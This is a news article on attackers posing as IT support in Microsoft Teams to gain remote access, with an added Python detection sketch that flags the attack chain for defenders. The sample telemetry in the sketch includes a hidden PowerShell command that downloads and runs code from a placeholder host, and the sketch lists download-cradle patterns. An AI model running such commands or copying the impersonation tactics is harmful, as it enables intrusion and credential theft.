Cybercriminals Exploit Microsoft Teams to Achieve Remote Access Using PowerShell Malware

Cybercriminals are increasingly weaponising Microsoft Teams, taking advantage of the platform’s trusted role in corporate communications to deploy malware and gain control of victim systems. In a sophisticated campaign, threat actors impersonate IT support staff in Microsoft Teams chats to deceive employees into granting remote access, representing a dangerous evolution from traditional email-based phishing attacks. Social engineering remains a highly effective tactic for hackers, and as businesses have integrated platforms like Microsoft Teams into their core operations, attackers have adapted their strategies accordingly. The inherent trust that employees place in internal messaging creates a fertile ground for deception. Recent campaigns analysed by Permiso Cybersecurity researchers reveal a multi-stage attack that begins with a simple message and culminates in the deployment of potent, multifunctional malware.

The attack chain often begins with a direct message or call from a newly created or compromised Microsoft Teams account. These accounts are crafted to appear legitimate, using display names such as “IT Support” or “Help Desk Specialist” to impersonate trusted personnel. Attackers frequently add checkmark emojis to simulate a verified status and leverage Microsoft’s onmicrosoft.com domain structure to appear as if they are part of the organisation.

By posing as IT staff addressing routine issues such as system maintenance, attackers build rapport with their targets. Once trust is established, they persuade employees to install remote access software, such as Quick Assist or AnyDesk, under the guise of providing technical assistance. This critical step grants the attacker a direct foothold on the user’s machine and in the corporate network. Recent incidents have shown that the payloads delivered this way have diversified, with malware loaders such as DarkGate and Matanbuchus now involved.

After securing remote access, the attacker executes a PowerShell command to download the primary malicious payload, which is equipped with capabilities for credential theft, long-term persistence, and remote code execution. To evade detection and complicate removal, the malware can designate its own process as “critical,” causing the system to crash if the process is terminated. It also presents a legitimate-looking Windows credential prompt to trick users into entering their passwords, which are then exfiltrated to an attacker-controlled server. Analysis of the payload’s code has revealed hardcoded encryption keys that link the campaign to a known financially motivated threat actor tracked as Water Gamayun (also known as Encry).
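As an added illustration (this is not code from the article or from Permiso’s research), the following Python sketches how a defender might correlate the stages described above over Teams-message and process-creation telemetry: an external “IT Support” contact, a remote access tool launch, and a PowerShell download cradle on the same host within a time window. The event field names (`host`, `type`, `ts`, `image`, `parent_image`, `command_line`, `display_name`, `sender_domain`, `external`) and the sample events are constructed for this example and do not follow any real product’s schema; the `.onmicrosoft.com` check is a weak signal on its own, since legitimate partner tenants use that domain structure too.

```python
"""Correlate the Teams -> remote-access tool -> PowerShell chain over
constructed sample telemetry (added example, not from the original article)."""
import re
from collections import defaultdict

# Remote access tools named in the article; extend this with whatever your
# organisation actually permits so that approved use is not flagged.
REMOTE_ACCESS_TOOLS = {"quickassist.exe", "anydesk.exe"}

# Common PowerShell download-cradle fragments (matched case-insensitively).
CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|"
    r"start-bitstransfer|-encodedcommand|\bfrombase64string\b",
    re.IGNORECASE,
)
# Display names used to impersonate IT staff, and the checkmark emojis used
# to fake a "verified" badge in the chat.
IMPERSONATION = re.compile(r"it support|help ?desk", re.IGNORECASE)
CHECKMARK = re.compile("[\u2705\u2714\u2611\u2713]")


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def flag_teams_message(ev):
    """Stage-1 indicators: an external sender posing as the help desk.
    Returns a list of (stage, reason) tuples; empty means nothing suspicious."""
    hits = []
    if ev.get("external") and ev.get("sender_domain", "").endswith(".onmicrosoft.com"):
        hits.append((1, "external sender on an onmicrosoft.com tenant"))
    name = ev.get("display_name", "")
    if IMPERSONATION.search(name):
        hits.append((1, "IT-support style display name"))
    if CHECKMARK.search(name):
        hits.append((1, "checkmark emoji imitating verified status"))
    return hits


def flag_process(ev):
    """Stage-2/3 indicators from a process-creation event."""
    hits = []
    image = basename(ev.get("image", ""))
    parent = basename(ev.get("parent_image", ""))
    cmd = ev.get("command_line", "")
    if image in REMOTE_ACCESS_TOOLS:
        hits.append((2, f"remote access tool launched: {image}"))
    if image in {"powershell.exe", "pwsh.exe"}:
        if CRADLE.search(cmd):
            hits.append((3, "PowerShell download cradle"))
        if parent in REMOTE_ACCESS_TOOLS:
            hits.append((3, f"PowerShell spawned by {parent}"))
    return hits


def analyse(events, min_stages=2, window=3600):
    """Per host, collect the chain stages seen within `window` seconds of the
    first indicator and return only hosts reaching `min_stages` distinct stages.
    A lone Invoke-WebRequest is noise; the same command after an external
    "IT Support" chat and an AnyDesk launch is the chain the article describes."""
    state = defaultdict(lambda: {"first_ts": None, "stages": set(), "reasons": []})
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["type"] == "teams_message":
            hits = flag_teams_message(ev)
        elif ev["type"] == "process_create":
            hits = flag_process(ev)
        else:
            hits = []
        if not hits:
            continue
        st = state[ev["host"]]
        if st["first_ts"] is None or ev["ts"] - st["first_ts"] > window:
            st.update(first_ts=ev["ts"], stages=set(), reasons=[])
        for stage, reason in hits:
            st["stages"].add(stage)
            st["reasons"].append(reason)
    return {h: s for h, s in state.items() if len(s["stages"]) >= min_stages}


# Constructed sample telemetry: one full chain on WS-042, benign noise on WS-007.
PS_PATH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"type": "teams_message", "host": "WS-042", "ts": 1700000000, "external": True,
     "display_name": "IT Support \u2705", "sender_domain": "contoso-helpdesk.onmicrosoft.com"},
    {"type": "process_create", "host": "WS-042", "ts": 1700000300,
     "image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "AnyDesk.exe"},
    {"type": "process_create", "host": "WS-042", "ts": 1700000400, "image": PS_PATH,
     "parent_image": r"C:\Program Files (x86)\AnyDesk\AnyDesk.exe",
     "command_line": "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://example.invalid/p')\""},
    # Benign: an admin pulling a report from a normal interactive shell.
    {"type": "process_create", "host": "WS-007", "ts": 1700000500, "image": PS_PATH,
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe Invoke-WebRequest https://example.invalid/r.csv -OutFile r.csv"},
    # Benign: an internal colleague's message.
    {"type": "teams_message", "host": "WS-007", "ts": 1700000600, "external": False,
     "display_name": "Alice Example", "sender_domain": "example.invalid"},
]

if __name__ == "__main__":
    for host, result in analyse(SAMPLE_EVENTS).items():
        print(host, sorted(result["stages"]), result["reasons"])
```

The design choice here is that no single indicator alerts: the admin’s `Invoke-WebRequest` on WS-007 is recorded as a stage-3 hit but never surfaces, while WS-042 reaches all three stages inside the window. Tuning `min_stages`, `window` and `REMOTE_ACCESS_TOOLS` to the environment is what turns this from a sketch into a usable rule.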

Categories: Cybersecurity Threats, Social Engineering Tactics, Malware Deployment Techniques 

Tags: Cybercriminals, Microsoft Teams, Malware, Social Engineering, Phishing, Remote Access, PowerShell, Credential Theft, Attack Chain, DarkGate 
